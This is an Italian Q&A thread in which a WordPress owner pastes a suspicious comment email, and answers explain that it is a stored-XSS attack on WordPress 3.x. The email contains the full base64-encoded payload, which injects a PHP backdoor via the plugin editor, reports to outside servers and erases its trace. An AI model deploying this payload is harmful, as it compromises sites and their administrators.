Le email dal mio sito WordPress sono un hack o solo un normale commento?

25

Ho ricevuto un'email per il mio sito WordPress, in cui la sezione dei commenti è disabilitata.

Questa era l'email:

"Autore: google (IP: 210.56.50.40, 210.56.50.40)

Email: [email protected]

URL: link

Chi è ?: link

Commento:

Benvenuto in WordPress. Questo è il tuo primo post.

[<a title="]" rel="nofollow"></a>[" <!-- style='position:fixed;top:0px;left:0px;width:6000px;height:6000px;color:transparent;z-index:999999999' onmouseover="eval(atob('dmFyIHggPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiYSIpOwp2YXIgaTsKZm9yIChpID0gMDsgaSA8IHgubGVuZ3RoOyBpKyspIHsKICAgIGlmKHhbaV0uc3R5bGUud2lkdGggPT0gIjYwMDBweCIpe3hbaV0uc3R5bGUuZGlzcGxheT0ibm9uZSI7fQp9Cgp2YXIgZWwgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJpZnJhbWUiKTsKZWwuaWQgPSAnaWZyYW1lMjInOwplbC5zdHlsZS5kaXNwbGF5ID0gImZpeGVkIjsKZWwuc3R5bGUudG9wPScxMDAwMHB4JzsKZWwuc3R5bGUubGVmdD0nMTAwMDBweCc7CmVsLnN0eWxlLndpZHRoID0gIjUwMHB4IjsKZWwuc3R5bGUuaGVpZ2h0ID0gIjUwMHB4IjsKZWwuc3JjID0gInBsdWdpbi1lZGl0b3IucGhwP2ZpbGU9aGVsbG8ucGhwJnBsdWdpbj1oZWxsby5waHAiOwpkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGVsKTsKZWwub25sb2FkID0gaHV5OwoKZnVuY3Rpb24gZ2V0SWZyYW1lRG9jdW1lbnQoaWZyYW1lTm9kZSkgewogIGlmIChpZnJhbWVOb2RlLmNvbnRlbnREb2N1bWVudCkgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudERvY3VtZW50CiAgaWYgKGlmcmFtZU5vZGU
 uY29udGVudFdpbmRvdykgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudFdpbmRvdy5kb2N1bWVudAogIHJldHVybiBpZnJhbWVOb2RlLmRvY3VtZW50Cn0KCmZ1bmN0aW9uIGh1eSgpewp2YXIgenp6ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2lmcmFtZTIyJyk7CnZhciBoaGggPSBnZXRJZnJhbWVEb2N1bWVudCh6enopOwppZiAoaGhoLmdldEVsZW1lbnRCeUlkKCJuZXdjb250ZW50IikudmFsdWUuaW5kZXhPZigiMTc2NGQxMzNkNzM1MWJmNmEyN2QyZGViM2M1MjFhMDIiKSA9PSAtMSkgewpoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZSA9IGF0b2IoIlBEOXdhSEFLQ21aMWJtTjBhVzl1SUZWdWIxOWxibU52WkdVb0pGTjBjbWx1WnlrS2V3b2dJQ0FnY21WMGRYSnVJSFZ5YkdWdVkyOWtaU2hpWVhObE5qUmZaVzVqYjJSbEtINGtVM1J5YVc1bktTazdDbjBLQ21aMWJtTjBhVzl1SUhKbGNHOXlkQ2drY21Oa0tYc0tJQ0FnSUNSeVpXTnBkbVZ5YzF0ZElEMGdKMmgwZEhBNkx5OXljQzVqWkMxcmVYbDNZWFJsY2k1amIyMHZKenNLSUNBZ0lDUnlaV05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1aWVXSjVMWE5vTlM1amIyMHZKenNLSUNBZ0lDUnlaV05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1MGFYUnBZVzVxWlhkbGJISjVMbU52YlM4bk93b2dJQ0FnSkhKbFkybDJaWEp6VzEwZ1BTQW5hSFIwY0RvdkwzSndMblIxYlc5MWNtaGxZV3gwYUM1amIyMHZKenNLSUNBZ0lDUnla
 V05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1amFHbHVZUzEwYjNWNWFXNW5hbWt1WTI5dEx5YzdDaUFnSUNBa2VpQTlJSE4wY2w5eVpYQnNZV05sS0NkM2NDMWpiMjUwWlc1MEwzQnNkV2RwYm5NdmFHVnNiRzh1Y0dod0p5d25KeXdrWDFORlVsWkZVbHNpVWtWUlZVVlRWRjlWVWtraVhTazdDaUFnSUNBa2NtVndiM0owSUQwZ1ZXNXZYMlZ1WTI5a1pTZ2tYMU5GVWxaRlVsc2lTRlJVVUY5SVQxTlVJbDB1SUNSNklDNGdKM3duSUM0Z0pISmpaQ2s3Q2lBZ0lDQnphSFZtWm14bEtDUnlaV05wZG1WeWN5azdDaUFnSUNCbWIzSmxZV05vS0NSeVpXTnBkbVZ5Y3lCaGN5QWtkQ2w3Q2lBZ0lDQWdJQ0FnWldOb2J5QW5QR2x0WnlCM2FXUjBhRDB4SUdobGFXZG9kRDB4SUhOeVl6MGlKeUF1SkhRZ0xpQW5QMlJoZEdFOUp5QXVKSEpsY0c5eWRDNG5JajRuT3dvZ0lDQWdmUXA5Q2dwbWRXNWpkR2x2YmlCeVpXMXZkbVZmWTI5dGJXVnVkQ2dwZXdvZ0lDQWdhVzVqYkhWa1pWOXZibU5sS0NjdUxpOHVMaTkzY0MxamIyNW1hV2N1Y0dod0p5azdDZ29nSUNBZ0pHTnZiaUE5SUcxNWMzRnNYMk52Ym01bFkzUW9SRUpmU0U5VFZDeEVRbDlWVTBWU0xFUkNYMUJCVTFOWFQxSkVLVHNLSUNBZ0lHMTVjM0ZzWDNObGJHVmpkRjlrWWloRVFsOU9RVTFGTENBa1kyOXVLVHNLQ2lBZ0lDQWtlbUZ3Y205eklEMGdKMlJsYkdWMFpTQm1jbTl0SUNjZ0xpQWtkR0ZpYkdWZmNISmxabWw0SUM0Z0oyTnZiVzFsYm5SeklIZG9aWEpsSUdOdmJXM
 WxiblJmWTI5dWRHVnVkQ0JzYVd0bElGd25KV0YwYjJJbFhDYzdKenNLSUNBZ0lDUnlJRDBnYlhsemNXeGZjWFZsY25rb0pIcGhjSEp2Y3lrN0NpQWdJQ0J0ZVhOeGJGOWpiRzl6WlNna1kyOXVLVHNLZlFvS1puVnVZM1JwYjI0Z2NHRjBZMmhmZDNBb0tYc0tJQ0FnSUNSbWJtRnRaU0E5SUNjdUxpOHVMaTkzY0MxamIyMXRaVzUwY3kxd2IzTjBMbkJvY0NjN0NpQWdJQ0JwWmlobWFXeGxYMlY0YVhOMGN5Z2tabTVoYldVcEtYc0tJQ0FnSUNBZ0lDQWtkQ0E5SUNjOFAzQm9jQ0JrYVdVb0tUc2dQejRuSUM0Z1VFaFFYMFZQVERzS0NpQWdJQ0FnSUNBZ0pIUnBiV1VnUFNCbWFXeGxiWFJwYldVb0pHWnVZVzFsS1RzS0lDQWdJQ0FnSUNBa2QzSnBkQ0E5SUdaaGJITmxPd29LSUNBZ0lDQWdJQ0JwWmlBb0lXbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ0FnSUNBa2NHVnliU0E5SUhOMVluTjBjaWh6Y0hKcGJuUm1LQ2NsYnljc0lHWnBiR1Z3WlhKdGN5Z2tabTVoYldVcEtTd2dMVFFwT3dvZ0lDQWdJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ0FnSUNBa2QzSnBkQ0E5SUhSeWRXVTdDaUFnSUNBZ0lDQWdmUW9LSUNBZ0lDQWdJQ0JqYkdWaGNuTjBZWFJqWVdOb1pTZ3BPd29nSUNBZ0lDQWdJR2xtSUNocGMxOTNjbWwwWVdKc1pTZ2tabTVoYldVcEtYc0tJQ0FnSUNBZ0lDQWdJQ0FnSkhSdGNDQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWdrWm01aG
 JXVXBPd29nSUNBZ0lDQWdJQ0FnSUNBa2RHMXdJRDBnSkhRZ0xpQWtkRzF3T3dvZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNCcFppQW9jM1J5YkdWdUtDUjBiWEFwSUQ0Z01UQXBld29LSUNBZ0lDQWdJQ0FnSUNBZ0pHWWdQU0JtYjNCbGJpZ2tabTVoYldVc0luY2lLVHNLSUNBZ0lDQWdJQ0FnSUNBZ1puQjFkSE1vSkdZc0pIUnRjQ2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lHWmpiRzl6WlNna1ppazdDaUFnSUNBZ0lDQWdmUW9LSUNBZ0lDQWdJQ0JqYkdWaGNuTjBZWFJqWVdOb1pTZ3BPd29LSUNBZ0lDQWdJQ0JwWmlBb0pIZHlhWFFwZXdvZ0lDQWdJQ0FnSUNBZ0lDQm1iM0lvSkdrOWMzUnliR1Z1S0NSd1pYSnRLUzB4T3lScFBqMHdPeTB0SkdrcGV3b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0pIQmxjbTF6SUNzOUlDaHBiblFwSkhCbGNtMWJKR2xkS25CdmR5ZzRMQ0FvYzNSeWJHVnVLQ1J3WlhKdEtTMGthUzB4S1NrN0NpQWdJQ0FnSUNBZ0lDQWdJSDBLSUNBZ0lDQWdJQ0FnSUNBZ1FHTm9iVzlrS0NSbWJtRnRaU3drY0dWeWJYTXBPd29nSUNBZ0lDQWdJSDBLQ2lBZ0lDQWdJQ0FnUUhSdmRXTm9LQ1JtYm1GdFpTd2tkR2x0WlNrN0NpQWdJQ0I5Q24wS0NtWjFibU4wYVc5dUlITmxiR1pmY21WdGIzWmxLQ2w3Q2lBZ0lDQWtabTVoYldVZ1BTQmZYMFpKVEVWZlh6c0tJQ0FnSUNSMGFXMWxJRDBnWm1sc1pXMTBhVzFsS0NSbWJtRnRaU2s3Q2lBZ0lDQWtkM0pwZENBOUlHWmhiSE5sT3dvS0lDQWdJR2xtSUNnaGFYTmZkM0pwZEd
 GaWJHVW9KR1p1WVcxbEtTbDdDaUFnSUNBZ0lDQWdKSEJsY20wZ1BTQnpkV0p6ZEhJb2MzQnlhVzUwWmlnbkpXOG5MQ0JtYVd4bGNHVnliWE1vSkdadVlXMWxLU2tzSUMwMEtUc0tJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ1IzY21sMElEMGdkSEoxWlRzS0lDQWdJSDBLQ2lBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b2dJQ0FnYVdZZ0tHbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ1IwYlhBZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9KR1p1WVcxbEtUc0tDaUFnSUNBZ0lDQWdKSEJ2Y3lBOUlITjBjbkJ2Y3lna2RHMXdMQ2N4TnpZMFpERXpNMlEzTXpVeFltWTJKeTRuWVRJM1pESmtaV0l6WXpVeU1XRXdNaWNwT3dvZ0lDQWdJQ0FnSUNSMGJYQWdQU0J6ZFdKemRISW9KSFJ0Y0N3a2NHOXpJQ3NnTXpJcE93b0tJQ0FnSUNBZ0lDQnBaaUFvYzNSeWJHVnVLQ1IwYlhBcElENGdNVEFwZXdvS0lDQWdJQ0FnSUNBZ0lDQWdKR1lnUFNCbWIzQmxiaWdrWm01aGJXVXNJbmNpS1RzS0lDQWdJQ0FnSUNBZ0lDQWdabkIxZEhNb0pHWXNKSFJ0Y0NrN0NpQWdJQ0FnSUNBZ0lDQWdJR1pqYkc5elpTZ2taaWs3Q2lBZ0lDQWdJQ0FnZlFvS0lDQWdJQ0FnSUNCamJHVmhjbk4wWVhSallXTm9aU2dwT3dvS0lDQWdJQ0FnSUNCcFppQW9KSGR5YVhRcGV3b2dJQ0FnSUNBZ0lDQWdJQ0JtYjNJb0pHazljM1J5YkdWdUtDUndaWEp0S1MweE95UnBQajB3
 T3kwdEpHa3Bld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdKSEJsY20xeklDczlJQ2hwYm5RcEpIQmxjbTFiSkdsZEtuQnZkeWc0TENBb2MzUnliR1Z1S0NSd1pYSnRLUzBrYVMweEtTazdDaUFnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBZ0lDQWdRR05vYlc5a0tDUm1ibUZ0WlN3a2NHVnliWE1wT3dvZ0lDQWdJQ0FnSUgwS0NpQWdJQ0FnSUNBZ1FIUnZkV05vS0NSbWJtRnRaU3drZEdsdFpTazdDaUFnSUNCOUNuMEtDaVJtYm1GdFpTQTlJQ2N1TGk4dUxpOTNjQzFqYjI1bWFXY3VjR2h3SnpzS0NtbG1LR1pwYkdWZlpYaHBjM1J6S0NSbWJtRnRaU2twZXdvS0lDQWdJQ1J5WTJRZ0lEMGdiV1ExS0NSZlUwVlNWa1ZTV3lKSVZGUlFYMGhQVTFRaVhTNGtYMU5GVWxaRlVsc2lTRlJVVUY5VlUwVlNYMEZIUlU1VUlsMHVjbUZ1WkNnd0xERXdNREF3S1NrN0NpQWdJQ0FrZENBOUlDZHBaaUFvYVhOelpYUW9KRjlTUlZGVlJWTlVXMXduUmtsTVJWd25YU2twZXlSZlUwVlNWa1ZTVXlBOUlITjBjbkpsZGlna1gxSkZVVlZGVTFSYlhDY25MaVJ5WTJRdUoxd25YU2s3SkY5R1NVeEZJRDBnSkY5VFJWSldSVkpUS0Z3bkpGOWNKeXh6ZEhKeVpYWW9KRjlTUlZGVlJWTlVXMXduUmtsTVJWd25YU2t1WENjb0pGOHBPMXduS1Rza1gwWkpURVVvYzNSeWFYQnpiR0Z6YUdWektDUmZVa1ZSVlVWVFZGdGNKMGhQVTFSY0oxMHBLVHQ5SnpzS0lDQWdJQ1IwYVcxbElEMGdabWxzWlcxMGFXMWxLQ1JtYm1GdFpTazdDaUFnSUNBa2MybDZaU
 0E5SUdacGJHVnphWHBsS0NSbWJtRnRaU2s3Q2lBZ0lDQWtkM0pwZENBOUlHWmhiSE5sT3dvS0lDQWdJR2xtSUNnaGFYTmZkM0pwZEdGaWJHVW9KR1p1WVcxbEtTbDdDaUFnSUNBZ0lDQWdKSEJsY20wZ1BTQnpkV0p6ZEhJb2MzQnlhVzUwWmlnbkpXOG5MQ0JtYVd4bGNHVnliWE1vSkdadVlXMWxLU2tzSUMwMEtUc0tJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ1IzY21sMElEMGdkSEoxWlRzS0lDQWdJSDBLQ2lBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b2dJQ0FnYVdZZ0tHbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ1IwYlhBZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9KR1p1WVcxbEtUc0tDaUFnSUNBZ0lDQWdKSFJ0Y0NBOUlITjBjbDl5WlhCc1lXTmxLQ2NrZEdGaWJHVmZjSEpsWm1sNEp5d2dKSFFnTGlCUVNGQmZSVTlNSUM0Z0p5UjBZV0pzWlY5d2NtVm1hWGduTENBa2RHMXdLVHNLSUNBZ0lDQWdJQ0JwWmlBb2MzUnliR1Z1S0NSMGJYQXBJRDRnTVRBcGV3b0tJQ0FnSUNBZ0lDQWdJQ0FnSkdZZ1BTQm1iM0JsYmlna1ptNWhiV1VzSW5jaUtUc0tJQ0FnSUNBZ0lDQWdJQ0FnWm5CMWRITW9KR1lzSkhSdGNDazdDaUFnSUNBZ0lDQWdJQ0FnSUdaamJHOXpaU2drWmlrN0NpQWdJQ0FnSUNBZ2ZRb0tJQ0FnSUNBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b0tJQ0FnSUNBZ0lDQnBaaUFvSkhkeWFYUXBld29nSUNBZ0lDQW
 dJQ0FnSUNCbWIzSW9KR2s5YzNSeWJHVnVLQ1J3WlhKdEtTMHhPeVJwUGowd095MHRKR2twZXdvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSkhCbGNtMXpJQ3M5SUNocGJuUXBKSEJsY20xYkpHbGRLbkJ2ZHlnNExDQW9jM1J5YkdWdUtDUndaWEp0S1Mwa2FTMHhLU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lIMEtJQ0FnSUNBZ0lDQWdJQ0FnUUdOb2JXOWtLQ1JtYm1GdFpTd2tjR1Z5YlhNcE93b2dJQ0FnSUNBZ0lIMEtDaUFnSUNBZ0lDQWdRSFJ2ZFdOb0tDUm1ibUZ0WlN3a2RHbHRaU2s3Q2lBZ0lDQjlDZ29nSUNBZ1kyeGxZWEp6ZEdGMFkyRmphR1VvS1RzS0lDQWdJR2xtS0NSemFYcGxJQ0U5UFNCbWFXeGxjMmw2WlNna1ptNWhiV1VwS1hzS0lDQWdJQ0FnSUNCeVpYQnZjblFvSkhKalpDazdDaUFnSUNCOUNuMEtDbkpsYlc5MlpWOWpiMjF0Wlc1MEtDazdDbkJoZEdOb1gzZHdLQ2s3Q25ObGJHWmZjbVZ0YjNabEtDazdDZ28vUGdvdkx6RTNOalJrTVRNelpEY3pOVEZpWmpaaE1qZGtNbVJsWWpOak5USXhZVEF5IikgKyBoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZTsKaGhoLmdldEVsZW1lbnRCeUlkKCJzdWJtaXQiKS5jbGljayggKTsKfQplbHNlIHsKenp6LnNyYyA9ICcuLi93cC1jb250ZW50L3BsdWdpbnMvaGVsbG8ucGhwJzsKfQp9'))" &gt; --><a></a>]

Modifica o cancella, quindi avvia il blogging! "

Che cos'è questo? Ho già cancellato il commento, ma sono curioso.

    
posta Joci93 24.04.2015 - 08:13
fonte

2 risposte

32

Il "Codice" sta "aggiustando" l'installazione di WordPress (wp-comments-post.php) e inviando alcune informazioni a diversi server (probabilmente c & c). Inoltre, si sta rimuovendo dal database.

In altre parole, è un hack. L'email che ricevi non è di Google Official. È da un account Gmail.

Le fonti decodificate sono qui:

L'exploit si basa sull'iniezione di script persistente di WordPress 3.x: link

    
risposta data 24.04.2015 - 08:47
fonte
16

Questo è un tentativo di hacking che contiene una combinazione speciale di caratteri che nasconde il codice del payload malevolo usando la codifica Base64 .

Il codice nascosto si basa su una versione precedente di WordPress utilizzata, ad esempio la versione 3.5. In queste versioni precedenti, ci sono trucchi che sono stati trovati. Questi trucchi ingannano le protezioni che cercano di impedire l'inserimento di script nei commenti. Viene eseguito utilizzando una combinazione di caratteri accuratamente elaborata che vengono interpretati erroneamente come codici brevi, HTML e testo in un modo che consente l'accesso all'evento JavaScript mouseover.

SUGGERIMENTO: MANTIENI IL WORDPRESS AGGIORNATO ALLA VERSIONE PIÙ RECENTE

Quando il mouseover viene attivato da qualcuno che ha effettuato l'accesso come amministratore, qualsiasi codice dannoso nel commento viene eseguito come se l'amministratore lo eseguisse.

    
risposta data 24.04.2015 - 09:10
fonte

Leggi altre domande sui tag